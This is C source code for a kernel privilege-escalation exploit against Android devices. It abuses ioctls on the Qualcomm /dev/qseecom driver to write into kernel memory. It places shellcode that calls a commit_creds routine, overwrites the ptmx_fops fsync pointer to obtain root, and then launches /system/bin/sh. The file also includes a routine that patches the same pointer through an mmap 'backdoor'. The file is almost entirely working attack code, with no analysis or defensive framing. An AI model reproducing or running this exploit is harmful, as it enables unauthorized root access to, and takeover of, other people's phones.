static bool
run_exploit(void)
{
void **ptmx_fsync_address;
unsigned long int ptmx_fops_address;
int fd;
bool ret;
ptmx_fops_address = get_ptmx_fops_address();
if (!ptmx_fops_address) {
return false;
}
if (!backdoor_open_mmap()) {
printf("Failed to mmap due to %s.\n", strerror(errno));
printf("Run 'install_backdoor' first\n");
return false;
}
ptmx_fsync_address = backdoor_convert_to_mmaped_address((void *)ptmx_fops_address + 0x38);
*ptmx_fsync_address = obtain_root_privilege;
ret = run_obtain_root_privilege(NULL);
*ptmx_fsync_address = NULL;
backdoor_close_mmap();
return ret;
}
int main(int argc, char *argv[]){
printf("mypid %d\n",getpid());
int ret = -1;
int fd = open("/dev/qseecom", 0);
if (fd<0){
perror("open");
exit(-1);
}
void* abuseBuff = malloc(400);
memset(abuseBuff,0,400);
int* intArr = (int*)abuseBuff;
int j = 0;
for(j=0;j<24;j++){
intArr[j] = 0x1;
}
struct qseecom_send_modfd_cmd_req ioctlBuff;
prctl(PR_SET_NAME, "GodFather", 0, 0, 0);
// if(0==fork()){
g_pid = getpid();
g_tgid = g_pid;
prctl(PR_SET_NAME, "ihoo.darkytools", 0, 0, 0);
//QSEECOM_IOCTL_SET_MEM_PARAM_REQ
struct qseecom_set_sb_mem_param_req req;
req.ifd_data_fd = obtain_dma_buf_fd(8192);
req.virt_sb_base = abuseBuff;
req.sb_len = 8192;
ret = ioctl(fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &req);
printf("QSEECOM_IOCTL_SET_MEM_PARAM_REQ return 0x%x \n",ret);
ioctlBuff.cmd_req_buf = abuseBuff;
ioctlBuff.cmd_req_len = 400;
ioctlBuff.resp_buf = abuseBuff;
ioctlBuff.resp_len = 400;
int i = 0;
for (i = 0;i<4;i++){
ioctlBuff.ifd_data[i].fd = 0;
ioctlBuff.ifd_data[i].cmd_buf_offset =0;
}
ioctlBuff.ifd_data[0].fd = req.ifd_data_fd;
ioctlBuff.ifd_data[0].cmd_buf_offset = 0;//(int)(0xc03f0ab4 + 8) - (int)abuseBuff;
printf("QSEECOM_IOCTL_SEND_CMD_REQ");
ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);
printf("return %p %p\n",intArr[0],intArr[1]);
perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
printf("ioctl return 0x%x \n",ret);
//*(int*)intArr[0] = 0x0;
void* addr = mmap(intArr[0],4096,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS,-1,0);
printf("mmap return %p \n",addr);
*(int*)addr = 0xE3500000;
*((int*)((int)addr+4)) = 0xe1a0f00e;
memcpy(addr,shell_code2,400);
int* arr = (int*)addr;
for(i=0;i<10;i++){
if(arr[i] == 0xeeeeeeee)
arr[i] = (int)MyCommitCred;
printf("%p\n",arr[i]);
}
//c1334e00 b ptmx_fops
ioctlBuff.ifd_data[0].cmd_buf_offset = (int)(PTMX_FOPS + 14*4) - (int)abuseBuff;
printf("QSEECOM_IOCTL_SEND_CMD_REQ");
ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);
printf("return %p %p\n",intArr[0],intArr[1]);
perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
printf("ioctl return 0x%x \n",ret);
run_obtain_root_privilege();
char * argv1[]={"sh",(char *)0};
int result = execv("/system/bin/sh", argv1);
if(result){
perror("execv");
}
return 0;
}
